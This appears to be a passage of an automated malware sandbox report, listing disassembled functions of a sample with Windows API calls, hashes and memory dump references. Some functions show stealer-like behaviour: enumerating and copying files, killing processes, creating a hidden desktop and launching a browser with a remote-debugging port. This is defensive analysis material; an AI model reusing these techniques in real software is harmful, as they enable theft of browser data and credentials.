                            • lstrcpy.KERNEL32(00000000,?), ref: 00131945
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013196C
                            • FindClose.KERNEL32(00000000), ref: 0013197B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 64b576881a49cf480b9a4e0319e37003fb4b1995864d709d289a65b45ed8dc17
                            • Instruction ID: b8daf528e34079656bcf7272856d547e7b3d8c493e165cbbf2604895adf13536
                            • Opcode Fuzzy Hash: 64b576881a49cf480b9a4e0319e37003fb4b1995864d709d289a65b45ed8dc17
                            • Instruction Fuzzy Hash: A112B271A11326EBCB25EF78EC8AAAE77B8AF54305F044528F846E7250DB34DD45CB90
                            Function 0013CDD0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0013CDEC
                            • FindFirstFileA.KERNEL32(?,?), ref: 0013CE03
                            • lstrcat.KERNEL32(?,?), ref: 0013CE4F
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 0013CE61
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 0013CE7B
                            • wsprintfA.USER32 ref: 0013CEA0
                            • PathMatchSpecA.SHLWAPI(?,013F8FD8), ref: 0013CED2
                            • CoInitialize.OLE32(00000000), ref: 0013CEDE
                              • Part of subcall function 0013CCD0: CoCreateInstance.COMBASE(0014B118,00000000,00000001,0014B108,?), ref: 0013CCF6
                              • Part of subcall function 0013CCD0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0013CD36
                              • Part of subcall function 0013CCD0: lstrcpyn.KERNEL32(?,?,00000104), ref: 0013CDB9
                            • CoUninitialize.COMBASE ref: 0013CEF9
                            • lstrcat.KERNEL32(?,?), ref: 0013CF1E
                            • lstrlen.KERNEL32(?), ref: 0013CF2B
                            • StrCmpCA.SHLWAPI(?,0014CFF4), ref: 0013CF45
                            • wsprintfA.USER32 ref: 0013CF6D
                            • wsprintfA.USER32 ref: 0013CF8C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0013CFA0
                            • wsprintfA.USER32 ref: 0013CFC8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0013CFE1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0013D000
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 0013D018
                            • CloseHandle.KERNEL32(00000000), ref: 0013D023
                            • CloseHandle.KERNEL32(00000000), ref: 0013D02F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0013D044
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013D084
                            • FindNextFileA.KERNEL32(?,?), ref: 0013D17D
                            • FindClose.KERNEL32(?), ref: 0013D18F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 9725f802c98a61060da8eada385264544e29d0682914b36c1c41e9f4a7771711
                            • Instruction ID: 3c6e45cf60bdba038042d8e8b50f497ed3de4e2190304fbca554f44897b267db
                            • Opcode Fuzzy Hash: 9725f802c98a61060da8eada385264544e29d0682914b36c1c41e9f4a7771711
                            • Instruction Fuzzy Hash: B9C18171900319AFCB25DF64EC45AEE77BDAF58701F004599F909A7290EB30AA85CF90
                            Function 00129770 Relevance: 45.7, APIs: 23, Strings: 3, Instructions: 234stringsleepCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 00129790
                            • lstrcat.KERNEL32(?,?), ref: 001297A0
                            • lstrcat.KERNEL32(?,?), ref: 001297B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 001297C3
                            • memset.MSVCRT ref: 001297D7
                              • Part of subcall function 00144040: lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00144075
                              • Part of subcall function 00144040: lstrcpy.KERNEL32(00000000,013FA5B0), ref: 0014409F
                              • Part of subcall function 00144040: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0012134E,?,0000001A), ref: 001440A9
                            • wsprintfA.USER32 ref: 00129806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00129827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00129844
                              • Part of subcall function 001448B0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 001448C9
                              • Part of subcall function 001448B0: Process32First.KERNEL32(00000000,00000128), ref: 001448D9
                              • Part of subcall function 001448B0: Process32Next.KERNEL32(00000000,00000128), ref: 001448EB
                              • Part of subcall function 001448B0: StrCmpCA.SHLWAPI(?,?), ref: 001448FD
                              • Part of subcall function 001448B0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00144912
                              • Part of subcall function 001448B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00144921
                              • Part of subcall function 001448B0: CloseHandle.KERNEL32(00000000), ref: 00144928
                              • Part of subcall function 001448B0: Process32Next.KERNEL32(00000000,00000128), ref: 00144936
                              • Part of subcall function 001448B0: CloseHandle.KERNEL32(00000000), ref: 00144941
                            • memset.MSVCRT ref: 00129862
                            • lstrcat.KERNEL32(00000000,?), ref: 00129878
                            • lstrcat.KERNEL32(00000000,?), ref: 00129889
                            • lstrcat.KERNEL32(00000000,00154B68), ref: 0012989B
                            • memset.MSVCRT ref: 001298AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 001298D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00129903
                            • StrStrA.SHLWAPI(00000000,013FE328), ref: 00129919
                            • lstrcpyn.KERNEL32(003593D0,00000000,00000000), ref: 00129938
                            • lstrlen.KERNEL32(?), ref: 0012994B
                            • wsprintfA.USER32 ref: 0012995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 00129971
                            • memset.MSVCRT ref: 00129986
                            • Sleep.KERNEL32(00001388), ref: 001299E7
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                              • Part of subcall function 001292B0: strlen.MSVCRT ref: 001292E1
                              • Part of subcall function 001292B0: strlen.MSVCRT ref: 001292FA
                              • Part of subcall function 001292B0: strlen.MSVCRT ref: 00129399
                              • Part of subcall function 001292B0: strlen.MSVCRT ref: 001293E6
                              • Part of subcall function 00144950: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00144969
                              • Part of subcall function 00144950: Process32First.KERNEL32(00000000,00000128), ref: 00144979
                              • Part of subcall function 00144950: Process32Next.KERNEL32(00000000,00000128), ref: 0014498B
                              • Part of subcall function 00144950: OpenProcess.KERNEL32(00000001,00000000,?), ref: 001449AC
                              • Part of subcall function 00144950: TerminateProcess.KERNEL32(00000000,00000000), ref: 001449BB
                              • Part of subcall function 00144950: CloseHandle.KERNEL32(00000000), ref: 001449C2
                              • Part of subcall function 00144950: Process32Next.KERNEL32(00000000,00000128), ref: 001449D0
                              • Part of subcall function 00144950: CloseHandle.KERNEL32(00000000), ref: 001449DB
                            • CloseDesktop.USER32(?), ref: 00129A1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Closememset$HandleNextProcessstrlen$CreateDesktopOpen$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 2040986984-1862457068
                            • Opcode ID: 3bba47113ef41b80570d8f62e9382db3074afefc52405c1d9ef3f7fea0c01f45
                            • Instruction ID: f20a08439b419d623ef2dffb239a339db4b01fadaa5bf58112922c67858a3020
                            • Opcode Fuzzy Hash: 3bba47113ef41b80570d8f62e9382db3074afefc52405c1d9ef3f7fea0c01f45
                            • Instruction Fuzzy Hash: 4E916371A00318EFDB11DFA4EC46FDE77B8AF58701F104599F609AB191DB70AA54CBA0
                            Function 001313B9 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001313E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131404
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013140F
                            • lstrlen.KERNEL32(00154CAC), ref: 0013141A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131437
                            • lstrcat.KERNEL32(00000000,00154CAC), ref: 00131443
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013146E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0013148A
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 001314AC
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 001314C6
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001314FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131527
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131532
                            • lstrlen.KERNEL32(0015179C), ref: 0013153D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013155A
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131566
                            • lstrlen.KERNEL32(?), ref: 00131573
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131593
                            • lstrcat.KERNEL32(00000000,?), ref: 001315A1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001315CA
                            • StrCmpCA.SHLWAPI(?,013FD388), ref: 001315F3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131634
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013165D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131685
                            • StrCmpCA.SHLWAPI(?,013FD758), ref: 001316A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 001316E3
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013170C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131734
                            • lstrcpy.KERNEL32(00000000,?), ref: 001318E6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013190E
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131945
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013196C
                            • FindClose.KERNEL32(00000000), ref: 0013197B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: a4c056d8155a3b2e19cd2c060fb95f3d9009cd2fce706c24ae1d9b558623dbe7
                            • Instruction ID: 6cbae7c60bd86e5b870ced04236426b186ff5ead2f9afa7c7b5857145821162b
                            • Opcode Fuzzy Hash: a4c056d8155a3b2e19cd2c060fb95f3d9009cd2fce706c24ae1d9b558623dbe7
                            • Instruction Fuzzy Hash: 09C1F531A10726EBCB22EF74EC89BAE77B8AF54305F040528F846A3660DB30DD45CB90
                            Function 0013E3F0 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 0013E40C
                            • FindFirstFileA.KERNEL32(?,?), ref: 0013E423
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 0013E443
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 0013E45D
                            • wsprintfA.USER32 ref: 0013E482
                            • StrCmpCA.SHLWAPI(?,0014CFF4), ref: 0013E494
                            • wsprintfA.USER32 ref: 0013E4B1
                              • Part of subcall function 0013EFC0: lstrcpy.KERNEL32(00000000,?), ref: 0013EFF2
                            • wsprintfA.USER32 ref: 0013E4D0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 0013E4E4
                            • lstrcat.KERNEL32(?,013FE878), ref: 0013E515
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013E527
                            • lstrcat.KERNEL32(?,?), ref: 0013E538
                            • lstrcat.KERNEL32(?,0015179C), ref: 0013E54A
                            • lstrcat.KERNEL32(?,?), ref: 0013E55E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0013E574
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E5B2
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E602
                            • DeleteFileA.KERNEL32(?), ref: 0013E63C
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013E67B
                            • FindClose.KERNEL32(00000000), ref: 0013E68A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: b67286ff980924f388f2f1eb3c3a447c92504f19e22b0f0f6e524b3ba0d86409
                            • Instruction ID: fe623d5b636325bb695abfd53934ebd2cd62ee47744fb47436e4856fcbb69757
                            • Opcode Fuzzy Hash: b67286ff980924f388f2f1eb3c3a447c92504f19e22b0f0f6e524b3ba0d86409
                            • Instruction Fuzzy Hash: 23817371900329EBCB21EF64EC45AEE77BDBF58301F004999F51A97190EB34AA58CF90
                            Function 001216B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001216E2
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00121719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0012176C
                            • lstrcat.KERNEL32(00000000), ref: 00121776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001217A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 001218F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001218FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: 75cde123edd45d5ca1147a6b552b9c708576b1df37f272513781eb7bf9d6c313
                            • Instruction ID: 85f9e2f839f849243c949b03301ab2f8fc98d9df9e79eaf90bfc84f756d0ef72
                            • Opcode Fuzzy Hash: 75cde123edd45d5ca1147a6b552b9c708576b1df37f272513781eb7bf9d6c313
                            • Instruction Fuzzy Hash: 2A81A13191123AFBCF22EF68F885AAE77B8AF65305F041125F805A7665CB309D61CB90
                            Function 0013DF20 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0013DF35
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0013DF3C
                            • wsprintfA.USER32 ref: 0013DF52
                            • FindFirstFileA.KERNEL32(?,?), ref: 0013DF69
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 0013DF8C
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 0013DFA6
                            • wsprintfA.USER32 ref: 0013DFC4
                            • DeleteFileA.KERNEL32(?), ref: 0013E010
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0013DFDD
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121557
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 00121579
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 0012159B
                              • Part of subcall function 00121530: lstrcpy.KERNEL32(00000000,?), ref: 001215FF
                              • Part of subcall function 0013DB70: memset.MSVCRT ref: 0013DB91
                              • Part of subcall function 0013DB70: memset.MSVCRT ref: 0013DBA3
                              • Part of subcall function 0013DB70: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0013DBCB
                              • Part of subcall function 0013DB70: lstrcpy.KERNEL32(00000000,?), ref: 0013DBFE
                              • Part of subcall function 0013DB70: lstrcat.KERNEL32(?,00000000), ref: 0013DC0C
                              • Part of subcall function 0013DB70: lstrcat.KERNEL32(?,013FE400), ref: 0013DC26
                              • Part of subcall function 0013DB70: lstrcat.KERNEL32(?,?), ref: 0013DC3A
                              • Part of subcall function 0013DB70: lstrcat.KERNEL32(?,013FD328), ref: 0013DC4E
                              • Part of subcall function 0013DB70: lstrcpy.KERNEL32(00000000,?), ref: 0013DC7E
                              • Part of subcall function 0013DB70: GetFileAttributesA.KERNEL32(00000000), ref: 0013DC85
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0013E01E
                            • FindClose.KERNEL32(00000000), ref: 0013E02D
                            • lstrcat.KERNEL32(?,013FE878), ref: 0013E056
                            • lstrcat.KERNEL32(?,013FDA38), ref: 0013E06A
                            • lstrlen.KERNEL32(?), ref: 0013E074
                            • lstrlen.KERNEL32(?), ref: 0013E082
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013E0C2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
